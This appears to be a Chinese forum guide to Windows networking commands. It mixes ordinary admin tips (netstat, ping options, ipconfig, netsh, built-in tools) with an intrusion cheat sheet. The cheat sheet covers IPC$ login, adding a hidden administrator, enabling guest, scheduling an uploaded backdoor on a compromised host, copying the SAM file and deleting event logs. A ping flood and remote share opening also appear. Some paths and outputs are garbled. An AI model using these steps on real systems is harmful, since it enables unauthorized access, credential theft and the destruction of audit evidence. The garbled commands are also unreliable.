网络常用基础知识大全

1）如何查看本机所开端口：
用netstat -a —n命令查看！
netstat结果显示有一些英文，简单说一下这些英文具体都代表什么:
LISTEN：侦听来自远方的TCP端口的连接请求
SYN-SENT：再发送连接请求后等待匹配的连接请求
SYN-RECEIVED：再收到和发送一个连接请求后等待对方对连接请求的确认
ESTABLISHED：代表一个打开的连接
FIN-WAIT-1：等待远程TCP连接中断请求，或先前的连接中断请求的确认
FIN-WAIT-2：从远程TCP等待连接中断请求
CLOSE-WAIT：等待从本地用户发来的连接中断请求
CLOSING：等待远程TCP对连接中断的确认
LAST-ACK：等待原来的发向远程TCP的连接中断请求的确认
TIME-WAIT：等待足够的时间以确保远程TCP接收到连接中断请求的确认
CLOSED：没有任何连接状态
2）如何获得一个IP地址的主机名？
利用ping -a ip 命令查看！第一行的pinging后面的 『ip』前面的英文就是对方主机名！
同样道理，利用ping machine_name也可以得到对方的ip
获得一个网站的ip地址的方法是：ping www.***.com
比如想知道sohu的ip，就用ping http://www.sohu.com/来查看就可以了
顺便说一句：如果返回：Reply from *.*.*.*: TTL expired in transit的话，呵呵，代表TTL（生命周期）在传输过程中过期.什么意思呢？我来解释一下！
导致这个问题出现的原因有两个：1）TTL值太小！TTL值小于你和对方主机之间经过的路由器数目。 2）路由器数量太多，经过路由器的数量大于TTL值！
呵呵，其实这两点是一个意思！只不过说法不同而已！
3）如何查看本机的ip地址？
用ipconfig来查看就可以！
也可以再Windows中的开始菜单，运行中输入winipcfg，同样可以看到自己的ip
ipconfig命令后面如果加一个参数 /all的话，可以得到更加详细的资料，比如DNS、网关等……
4）使用net命令的时候遇到一些错误代码，如何查看对应的错误信息？
用命令 net helpmsg erorr_code来查看就可以了
比如错误代码为：88
则查看命令为：net helpmsg 88 下面有这个错误代码的中文显示！
5）利用telnet连接到对方主机上，想获得一些系统信息，用什么命令？
set命令可以很好的完成你所需要收集信息的任务的！
方法：再cmd下直接输入set（telnet对方主机以后，也是直接set就可以了～然后能够得到NNNNN多的信息）
这里，computername：呵呵，还用说么？主机名！
OS＝Windows_NT ：操作系统的类型哦～
path＝C:perlin ：（perl的解释器位置！）
systemDrive=c: 操作系统盘符！
USERNAME=coldcrysky 当前登陆使用机器的用户
……
（6）跟踪路由器的命令是什么？
tracert 格式：tracert ip
中间会列出所有经过的路由器列表！这些路由器如果是暴露再防火墙外面的话，还可以看到路由的IP哦～呵呵（这里又涉及到了另外一个问题：为什么要把路由放在防火墙后面？原因呢，主要有两点：1）保护路由器！因为现在越来越多的攻击和入侵已经开始瞄准路由器了～如果直接把路由暴露在外面，呵呵，是非常危险的！被DoS了就不好了啊～呵呵，所以要放在防火墙里面；2）为路由器减少负担！如果所有的过滤功能统统都压在路由器上面，呵呵，路由器的负担就太大了！）
当然，利用pathping也可以达到同样效果！格式与tracert一样！
7）简单介绍一下cookie！
cookie，又名小甜点。
它的作用：记录访问者的一些信息。例如利用cookie记录你所登陆这个网页的次数、登陆时曾经输入的信息……
最常见的是，大家再登陆论坛（邮箱）的时候，经常在输入第一个字母的时候，往往下面就显示出了所有在本机登陆过该论坛（邮箱）的用户名吧？呵呵，这个就是cookie的作用！
大家在Administrator的cookies目录中可以看到很多的记事本文档吧？这些都是cookie，虽然经过了加密，但是仔细查找的话，仍然能够看到一些敏感信息！况且现在也已经有了专门查看cookie的软件！利用这些软件，你的隐私将不保哦～
那么，如何清除cookie呢？一般情况下，可以在Internet选项中的常规选项卡中看到一个删除cookies的按钮，点击就可以清楚掉了～
除此以外，还要在internet选项中的内容选项卡中找到自动完成按钮，把里面的四项都选中！然后点击清除表单，清除密码～
然后到操作系统目录所在的分区中！进入Winnt（98为windows）目录（当然了，这些都是默认的目录！如果你安装的时候改名了，就对应的去相应目录）之后找到Temporary Internet Files目录（2000的目录在c:Documents and settingsadministratorLocal settingsTemporary Internet Files）98直接到windows目录下找Temporary Internet Files就可以了～，找到这个文件夹后，打开！看到里面有NNNNNNNNNNNN多的文件了么？呵呵，这些是你浏览过的网页的记录（有的时候从网站上面看到漂亮的FLASH，可是不能保存怎么办？只要在线浏览一遍以后，断线到这里来找*.swf，之后依次打开查看的话，相信你会找到你所需要的 FLASH的！），好了，跑题了～继续说：这些文件是网站的页面记录，直接删除就可以了！
另外，有没有彻底禁止cookie的方法呢？
呵呵，当然有了！在IE的Internet选项中，找到隐私选项卡！，把里面的滑块拖到最上面，边上写着：阻止所有cookie，呵呵，是不是？
另外一种方法：找到Windows目录下的cookies目录！把里面的txt文件全部删除！，最后应该只剩下一个index.dat文件！之后把这个文件夹设置成只读就可以了～
不过，禁止cookie后，大部分的论坛都无法正常登陆了啊！呵呵，到底禁止不禁止就看你自己的了～
8)ping不到，tracert不到，但是却能用nbtstat显示对方的一些信息，为什么？
因为tracert和ping命令使用的是ICMP协议！而nbtstat是通过对方的netbios端口来获得对方的主机信息的！使用的是UDP和TCP协议！如果对方仅仅只对ICMP协议做了禁止的话，那通过这个命令获得系统信息是正常的！
9）telnet上去后，如何给对方开共享？
开共享的命令如下：net share c=c:winntsystem 返回共享成功
之后直接利用\ipc来访问对方的system目录了～删除共享用
share c /del 命令就可以了
10）如何判断对方的具体操作系统版本？
首先用ver命令查看对方的版本号！
如果是5.00.2195的话，为2K；5.1.2600为XP
从这里可以区分出来到底是2K还是XP了～下面进行更加具体的区分！
2K的pro和svr版本区分：
在telnet下，net shart查看启动的服务～如果对方开启了Terminal Services服务的话，基本上可以判断为svr以上的版本了～如果没有开启，则为pro！（具体方法有三种，因为前几天在论坛中我回复过暗界了～所以这里就不再重复了～）
XP的pro和home版的区分：
home edition是无法安装iis的！所以，可以通过iis服务来判断到底是home版或者是pro了～
当然了，如果对方是pro，但是将iis删除（停用）的话，就没办法判断了～呵呵
11）上次说了ping的基本用法，这次谈谈ping的命令参数！
这个是本次问题集的重点部分！无论是小鸟还是老鸟，你们能保证你真的对这些参数了如指
掌么？恐怕都未必！还是好好看看吧！
这是TCP／IP协议中最有用的命令之一
它给另一个系统发送一系列的数据包，该系统本身又发回一个响应，这条实用程序对查找远
程主机很有用，它返回的结果表示是否能到达主机，宿主机发送一个返回数据包需要多长时
间。
Usage： ping ［-t］ ［-a］ ［-n count］ ［-l size］ ［-f］ ［-i TTL］ ［-v TOS］
［-r count］ ［-s count］ ［［-j host-list］ ［-k host-list］］
［-w timeout］ destination-list
Options：
-t Ping the specifed host until interrupted.（除非人为中止，否则一直ping下去）
-a Resolve addresses to hostnames.（把IP转为主机名）
-n count Number of echo requests to send.（响应请求的数量）
-l size Send buffer size.（封包的大小）
-f Set Don`t Fragment flag in packet.（信息包中无碎片）
-i TTL Time To Live.（时间）
-v TOS Type Of Service.（服务类型）
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.（较严格的……唉，怎么译好……
算了，放着吧）
-w timeout Timeout in milliseconds to wait for each reply.（timeout的时间）
比如大家可能都知道的一个命令 # ping -f -s 65000 ***.***.***.***或者前阶段大家所
谓ping死霉国佬时所用的命令（当然这样只会造成我方自己的网络阻塞）。
其实这个命令主要是用来看对方应答的速度，如果怎么ping 得到的结果都是request time
out。那恐怕你根本就不用你去找这台主机了，它不在你的射程之内。
12）如何查看本机的DNS服务器？
ipconfig其实是可以的（呵呵，上次就介绍过这个命令），除此以外，还可以利用一个命令：
再cmd下输入netsh，进入到netsh>提示符，再输入：int ip 进入到interface ip> 然后
再次输入dump，这时候屏幕上出现当前连接的配置情况了
这里必须介绍一下netsh到底是作什么用的！这个命令比较复杂，他包含了很多的子命令，
所以这里只对部分命令进行讲解：
a）查看本机IP：首先键入netsh，再netsh>提示符下输入：interface 回车 之后：ip 回
车 再之后：show address 回车 这样，就可以看到当前连接的IP地址和子网掩码。（其实
这个命令不如ipconfig简单，也不如ipconfig/all全面）
b）修改网络配置：接着上面的命令，我们使用：set address name=“本地连接” source=static
addr=192.168.0.200 mask=255.255.255.0，这样就修改了当前的IP地址，用show address
来看看（或者用ipconfig）
c）显示一个完整的网络配置教本：
刚才说过，第一个命令显示的信息不如ipconfig/all全面，不用着急，netsh再打印显示
网络配置上，还是有自己的特色的！例如：再interface ip>状态下输入：dump，会显示一
个清单，显示所有本地连接（不管你是否使用～）与netstat -an不完全一样！
这就是netsh的简单介绍和最基础的用法！希望大家能够掌握！还可以输入？来查看帮助！
（要在netsh>提示符下才能查看帮助啊～）
13）网络命令小结
A、NET命令：
IPC连接：格式 net use \对方IPipc$ "密码" user:"用户名" 『建立IPC连接～』
net use \对方IPipc$ /delete 『断开连接～』
以下操作需要在连接到对方主机后才可进行！！！
net user coldcrysky xyz /add 『在连接的目标主机中加入一个用户名为COLDCRYSKY 密
码为WYZ的用户』
net localgroup Administrator coldcrysky /add 『把名为coldcrysky的用户加入ADMIN
组-以为着权限的提高啊！！！^_^』
net use z:\对方IPC$ 『把对方的C盘映射为本机的Z盘-可依照需要更改映射盘符！』
net start telnet 『开启TELNET』
net user guest /active:yes 『激活GUEST』
net user guest coldcrysky 『把GUEST密码改为COLDCRYSKY』
B、AT命令：
查看远程机时间：net time \对方IP
加入一项新任务：
at \对方IP 时间 文件名 『用来把自己上传的后门程序在制定时间运行，方便以后进入
肉鸡！』
C、TELNET命令：
telnet 对方IP 端口 『作用不用我说了吧？？？』
D、FTP命令：
登陆：ftp 对方网址（IP地址）
上传文件：get 文件在本机完整路径 对方文件存放完整路径
下载文件：put 对方文件完整路径 本机存放文件路径
E、COPY命令：
在建立连接后（尤其是IPC$连接后，很有用的命令哦～）
⑴copy index.htm \127.0.0.1c$index.htm
『将本机index.htm文件复制到127.0.0.1的C盘下，如果要放到对方的NT目录下，则把
C改为admin$』
⑵copy \127.0.0.1admin epairsam_ c: 『将远程机数据库文件拷贝到本机C盘根目录
下』F、SET命令：
主要用于分析目标计算机的基本信息用！具体使用方法请查找相关文件！
G、NBTSTAT命令：
nbtstat -A 对方IP （这个A大写）
『在其中显示前面的英文或数字就是计算机名称！当然，也可以利用PING -A 对方ip的方
法来查看对方主机名！效果相同！！！』
H、SHUTDOWN命令：
『用来关闭对方NT服务的命令』格式如下：
shutdown \IP地址 t:20
『20秒后自动关闭对方NT服务！由于对对方机器影响较大，慎用！！！』
I、DIR命令：
还用我说么？大家是不是早就该掌握了？？？（不知道的还是查阅相关资料吧～～～）
J、ECHO命令：
echo coldcrysky >index.htm 『用coldcrysky覆盖掉原INDEX.HTM中所有内容』
echo coldcrysky >>index.htm 『把coldcrysky加入到index.htm中』
K、ATTRIB命令：
更改文件属性用，格式：
Attrib -r index.htm 『去掉只读属性』（＋- 分别代表增加和减少）
L、DEL命令：
『删除日志的时候用！』
del c:winntsystem32logfiles*.*
del c:winntsystem32config*.evt
del c:winntsystem32dtclog*.*
del c:winntsystem32*.log
del c:winntsystem32*.txt
del c:winnt*.txt
del c:winnt*.log
M、PING命令：
-t ：ping制定IP，知道网络断开或按CTRL C结束！
-a ：解释PING IP的主机名
-n count ：发送count指定的ECHO数据包，默认为4个！
14）这里我必须（或者说不得不重新重申一个命令！不过说之前我要把这个命令的相关命
令稍微介绍一下！）
我要说的命令就是：开启服务和停止服务的net start and net stop
这两个命令大多数朋友已经很熟悉了吧？不过为了方便更多的菜鸟能看明白我要说的意思，
不用再看其他相关文章，所以我简单说两句：net start是开启服务！那么，如何开启呢？
比如，我们这里要开启telnet服务，那就直接再2K的cmd下输入：net start telnet就
OK了～关闭一项服务的话，把start换成stop就OK了～不过这里必须要注意：你所关闭
的服务必须是已经开启的服务！！！好像是一句废话
OK，有了这个前提后，下面就继续介绍：那么，net start和net stop到底能开启什么服
务？其实这点也不需要你强记，记住这个命令就可以了：net help start和net help stop，
这两个会显示出你所能开启的服务有那些~~
这里比如我们查到了这个服务"CLIENT SERVICE FOR NETWARE"，那么当这个命令使用net
start和net stop的时候，你必须在这项服务上面加上""，原因是因为这个服务名称中
带有空格！如果服务名称中不带空格，你可以不用带这个引号！！！这点是我强调的问题！大
家一定不要忘记了！『前些天看到S8S8.net的黑白新区中有人说net start 和 net stop
后面的服务名必须带空格是错误的！明白原因了吧？』
15）系统自带的系统工具
其实无论大家从什么地方，什么方法找到一些好用的工具，都不如Windows自带的工具用着
方便（假设你区的地方正好不能上网，而你又没有准备好这些工具，那怎么办？呵呵，不用
着急，用好下面几个Windows自带的小工具，可以使你事半功倍！）
1、msinfo32.exe
位于C:Program FilesCommon Files
Microsoft SharedMsinfomsinfo32.exe，显示计算机中的有关系统信息，可用其诊断、解
决计算机问题并查看远程系统所生成的系统报告。
2、drwatson.exe --这个工具给我特别的亲密感觉：第一次使用这个工具是在看了LK007
大哥给cool兄弟的回复以后，我马上试验～果然很有意思！LK007不愧是大哥！现在想起
来都佩服不已~~~
位于C: Windows drwatson.exe，当某个应用程序在运行过程中出错时，它就会将出错的
程序以及出错的内存地址一一记录下来，并保存为Windows的Drwatson子目录下的*.wlg
记录文件。
3、sfc.exe
位于C:WindowsSystemsfc.exe，用于自动搜索被改变、删除或损坏了的系统文件。
4、msconfig.exe
位于C:WindowsSystemmsconfig.exe，通过修改启动方式以及启动时运行哪些应用程序
等系统配置，从而达到快速排除故障的目的。
5、scanreg.exe
位于C:windowscommandscanreg.exe（DOS版本）及C:windowsscanregw.exe（Windows
版本），用于检查、修复、备份以及还原系统注册表及相关配置文件的工具软件，防止因注
册表数据被破坏而导致的系统故障。
6、vcmui.exe
位于C:Windowsvcmui.exe，在后台自动将被覆盖的驱动程序备份下来，当我们安装的新
驱动出错时可用它进行恢复。
7、winrep.exe
位于C:Windowswinrep.exe，能自动收集有关系统信息并提示用户输入故障所在，帮我们
编写一篇完整的"求援"报告，并将其发送给有关技术维护人员，简化"求援"操作。
这七个Windows自带的小程序可以在开始菜单--运行中直接输入文件名（无需输入扩展名）
调出该程序！
16）再说几个非常简单实用的DOS命令（工具）：
A、fport.exe --查看那些端口都是那些程序使用的命令。
B、netstat -an --查看那些端口于外部的IP连接。比如这里显示 ：23 XX.XX.XX.XX 而你
又没有开23端口，那么，呵呵……还用我说么？
C、letmain.exe \ip -admin -d --列出本机的administrators组的用户名查看是否有异
常。
D、pslist.exe --列出进程
E、pskill.exe --杀掉进程，有时候再任务管理器中无法终止程序，那就用这个工具来停止
进程。
F、login.exe --列出当前有那些用户登陆再你的机器上。
ping命令详解
ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count]
[[-j computer-list] | [-k computer-list]] [-w timeout] destination-list
Options:
-t Ping the specified host until stopped.To see statistics and continue - type
Control-Break;To stop - type Control-C.
不停的ping地方主机，直到你按下Control-C。
此功能没有什么特别的技巧，不过可以配合其他参数使用，将在下面提到。
-a Resolve addresses to hostnames.
解析计算机NetBios名。
示例：C:＼>ping -a 192.168.1.21
Pinging iceblood.yofor.com [192.168.1.21] with 32 bytes of data:
Reply from 192.168.1.21: bytes=32 timeping -n 50 202.103.96.68
Pinging 202.103.96.68 with 32 bytes of data:
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Request timed out.
………………
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Ping statistics for 202.103.96.68:
Packets: Sent = 50, Received = 48, Lost = 2 (4% loss),Approximate round trip times
in milli-seconds:
Minimum = 40ms, Maximum = 51ms, Average = 46ms
从以上我就可以知道在给202.103.96.68发送50个数据包的过程当中，返回了48个，其中
有两个由于未知原因丢失，这48个数据包当中返回速度最快为40ms，最慢为51ms，平均速
度为46ms。
-l size Send buffer size.
定义echo数据包大小。
在默认的情况下windows的ping发送的数据包大小为32byt，我们也可以自己定义它的大
小，但有一个大小的限制，就是最大只能发送65500byt，也许有人会问为什么要限制到
65500byt，因为Windows系列的系统都有一个安全漏洞（也许还包括其他系统）就是当向对
方一次发送的数据包大于或等于65532时，对方就很有可能挡机，所以微软公司为了解决这
一安全漏洞于是限制了ping的数据包大小。虽然微软公司已经做了此限制，但这个参数配
合其他参数以后危害依然非常强大，比如我们就可以通过配合-t参数来实现一个带有攻击
性的命令：（以下介绍带有危险性，仅用于试验，请勿轻易施于别人机器上，否则后果自负）
C:＼>ping -l 65500 -t 192.168.1.21
Pinging 192.168.1.21 with 65500 bytes of data:
Reply from 192.168.1.21: bytes=65500 timeping -n 1 -r 9 202.96.105.101 （发送一
个数据包，最多记录9个路由）
Pinging 202.96.105.101 with 32 bytes of data:
Reply from 202.96.105.101: bytes=32 time=10ms TTL=249
Route: 202.107.208.187 ->
202.107.210.214 ->
61.153.112.70 ->
61.153.112.89 ->
202.96.105.149 ->
202.96.105.97 ->
202.96.105.101 ->
202.96.105.150 ->
61.153.112.90
Ping statistics for 202.96.105.101:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 10ms, Maximum = 10ms, Average = 10ms
从上面我就可以知道从我的计算机到202.96.105.101一共通过了202.107.208.187 ，
202.107.210.214 , 61.153.112.70 , 61.153.112.89 , 202.96.105.149 , 202.96.105.97
这几个路由。
-s count Timestamp for count hops.
指定 count 指定的跃点数的时间戳。
此参数和-r差不多，只是这个参数不记录数据包返回所经过的路由，最多也只记录4个。
-j host-list Loose source route along host-list.
利用 computer-list 指定的计算机列表路由数据包。连续计算机可以被中间网关分隔（路
由稀疏源）IP 允许的最大数量为 9。
-k host-list Strict source route along host-list.
利用 computer-list 指定的计算机列表路由数据包。连续计算机不能被中间网关分隔（路
由严格源）IP 允许的最大数量为 9。
-w timeout Timeout in milliseconds to wait for each reply.
指定超时间隔，单位为毫秒。
此参数没有什么其他技巧。
17）ping命令的其他技巧：
在一般情况下还可以通过ping对方让对方返回给你的TTL值大小，粗略的判断目标主
机的系统类型是Windows系列还是UNIX/Linux系列，一般情况下Windows系列的系统返回
的TTL值在100-130之间，而UNIX/Linux系列的系统返回的TTL值在240-255之间，当然
TTL的值在对方的主机里是可以修改的，Windows系列的系统可以通过修改注册表以下键值
实现：
[HKEY_LOCAL_MACHINE＼SYSTEM＼CurrentControlSet＼Services＼Tcpip＼Parameters]
"DefaultTTL"=dword:000000ff
255---FF
128---80
64----40
32----20